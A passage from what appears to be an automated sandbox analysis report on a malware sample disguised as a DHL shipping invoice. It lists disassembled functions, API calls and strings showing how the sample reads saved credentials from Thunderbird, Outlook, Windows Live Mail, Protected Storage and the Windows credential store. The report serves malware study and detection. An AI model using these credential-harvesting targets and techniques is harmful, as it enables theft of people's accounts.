                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                                                                                                                                                                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                                                                                                                                                                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                                                                                                                                                                                                      • API String ID: 1846531875-4223776976
                                                                                                                                                                                                                                      • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,757C0A60,?,00000000,?,?,?,0040CF60,757C0A60), ref: 00404AB8
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,757C0A60), ref: 00404ADE
                                                                                                                                                                                                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                                                                                                      • API String ID: 745651260-375988210
                                                                                                                                                                                                                                      • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                                                                                                      • API String ID: 1197458902-317895162
                                                                                                                                                                                                                                      • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                                                                      • String ID: h4ND$kNv
                                                                                                                                                                                                                                      • API String ID: 3662548030-1769922376
                                                                                                                                                                                                                                      • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                      • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                                                                                                                                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                                                                      • API String ID: 2768085393-1693574875
                                                                                                                                                                                                                                      • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                                                                                                      • API String ID: 832325562-2578778931
                                                                                                                                                                                                                                      • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F567
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040F57F
                                                                                                                                                                                                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2012582556-3916222277
                                                                                                                                                                                                                                      • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 345 4038bf-4038dd _mbscpy call 4023e5 342->345 344 4038a4-4038bc sprintf 343->344 343->345 344->345 345->334
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037EB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004037FF
                                                                                                                                                                                                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                                                                                                                                                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      • strchr.MSVCRT ref: 0040386E
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00403897
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 004038B7
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                                                                      • String ID: %s@yahoo.com
                                                                                                                                                                                                                                      • API String ID: 317221925-3288273942
                                                                                                                                                                                                                                      • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 347 4034e4-403544 memset * 2 call 410b1e 350 403580-403582 347->350 351 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 347->351 351->350
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                                                                      • API String ID: 3071782539-966475738
                                                                                                                                                                                                                                      • Opcode ID: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                      • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8255885af10a91bc56e48e40ef87396276e308e7910b77f5f681434f29254a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 356 40f6e2-40f70a call 40466b call 4045db 361 40f710-40f717 call 404734 356->361 362 40f7e9-40f801 call 404656 call 404785 356->362 361->362 367 40f71d-40f72e CredReadA 361->367 367->362 369 40f734-40f73a 367->369 371 40f740-40f743 369->371 372 40f7e5 369->372 371->372 373 40f749-40f759 371->373 372->362 374 40f75a-40f770 373->374 374->374 375 40f772-40f795 call 4047a5 374->375 378 40f7e2 375->378 379 40f797-40f7b6 WideCharToMultiByte 375->379 378->372 380 40f7b8-40f7c6 strlen 379->380 381 40f7d9-40f7dc LocalFree 379->381 380->381 382 40f7c8-40f7d8 _mbscpy 380->382 381->378 382->381
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
